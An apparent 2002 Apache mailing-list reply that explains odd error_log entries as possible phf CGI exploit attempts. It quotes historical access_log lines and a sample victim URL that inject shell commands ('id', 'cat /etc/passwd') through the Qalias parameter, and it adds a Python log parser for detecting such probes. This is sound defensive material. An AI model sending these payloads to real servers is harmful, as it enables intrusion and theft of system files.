On Fri, 15 Mar 2002, Dharmendra.T wrote:

> Hi,
> I hope you have written a php cgi-bin script. And when the user tries to access
> some document in the cgi-bin directory it is looking for the php in
> /usr/local/bin/php.
> Another chance is somebody trying the phf exploit on your machine.

> On Friday 15 March 2002 02:12 am, Tiago Fioreze wrote:
> > I'm noting the following message in my error_log file
> > of Apache :
> >
> > sh: /usr/local/bin/ph: não localizado.
> > sh: /usr/local/bin/ph: não localizado.
> > sh: /usr/local/bin/ph: não localizado.
> > sh: /usr/local/bin/ph: não localizado.
> > sh: /usr/local/bin/ph: não localizado.
> > sh: /usr/local/bin/ph: não localizado.
> >
> > PS. 'não localizado' = not located

Maybe this helps:

Example phf exploit attempts

These are from an actual Apache httpd access_log file:

m52bmi.dave-world.net - - [07/Jul/1996:23:57:23 -0700] "GET /cgi-bin/phf?QAlias=x%20/etc/ls%20/etc HTTP/1.0" 404 -
kairos.algonet.se - - [27/Oct/1996:09:00:33 -0800] "GET /cgi-bin/phf?Jserver=a&Qalias=a%0Aid HTTP/1.0" 500 -
kairos.algonet.se - - [27/Oct/1996:09:01:25 -0800] "GET /cgi-bin/phf?Jserver=a&Qalias=a%0Acat%20/etc/passwd HTTP/1.0" 500 -
ts-oc01-26.skyenet.net - - [03/Dec/1996:08:00:53 -0800] "GET /cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -
ts-oc01-26.skyenet.net - - [03/Dec/1996:08:01:21 -0800] "GET /cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -
ns - - [11/Feb/1997:06:18:21 -0800] "GET /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -

from http://staff.washington.edu/~dittrich/talks/web-security/phf.html

see also:
http://www.happyhacker.org/harmless/browser9.shtml

http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and: phf prober perl script
http://www.eng.auburn.edu/users/rayh/software/phf.html

--------------
David Correa
Public Key http://www.linux-tech.com/linuxtech.asc
Key fingerprint 7F2C E072 479D 71B4 008B 373E A284 8CDE 7659 F5D8
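
One way to check an access_log for requests like the ones quoted above, as an added example that is not part of the original message: it picks out requests for a script named phf and marks those whose decoded query values contain a newline. The function name, sample log lines and host names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+$')

def find_phf_probes(lines):
    """Return one dict per request whose script name is 'phf'.

    'injected' is True when any percent-decoded query value contains
    CR or LF, the separator seen in the requests quoted in this thread.
    """
    hits = []
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue  # not Common Log Format; skip rather than guess
        host, when, method, target, status = m.groups()
        url = urlsplit(target)
        # Compare only the last path segment, so /cgi-bin/php is not flagged
        if url.path.rsplit("/", 1)[-1].lower() != "phf":
            continue
        # parse_qsl percent-decodes values: %0a and %0A both become "\n"
        params = parse_qsl(url.query, keep_blank_values=True)
        injected = any("\n" in v or "\r" in v for _, v in params)
        hits.append({"host": host, "time": when, "method": method,
                     "status": int(status), "injected": injected,
                     "params": params})
    return hits

# Constructed sample lines (hypothetical hosts under .example)
SAMPLE = [
    'a.example - - [15/Mar/2002:02:10:01 -0300] "GET /index.html HTTP/1.0" 200 1043',
    'b.example - - [15/Mar/2002:02:11:40 -0300] "GET /cgi-bin/php?page=index HTTP/1.0" 200 512',
    'c.example - - [15/Mar/2002:02:12:05 -0300] "GET /cgi-bin/phf?Qalias=x%20/etc/ls%20/etc HTTP/1.0" 404 -',
    'd.example - - [15/Mar/2002:02:12:09 -0300] "GET /cgi-bin/phf?Jserver=a&Qalias=a%0Aid HTTP/1.0" 500 -',
    'd.example - - [15/Mar/2002:02:12:31 -0300] "GET /cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -',
]

if __name__ == "__main__":
    for hit in find_phf_probes(SAMPLE):
        flag = "newline in query" if hit["injected"] else "no newline"
        print(hit["time"], hit["host"], hit["status"], flag)
```

A 404 status on a flagged line means the server had no phf script at that path.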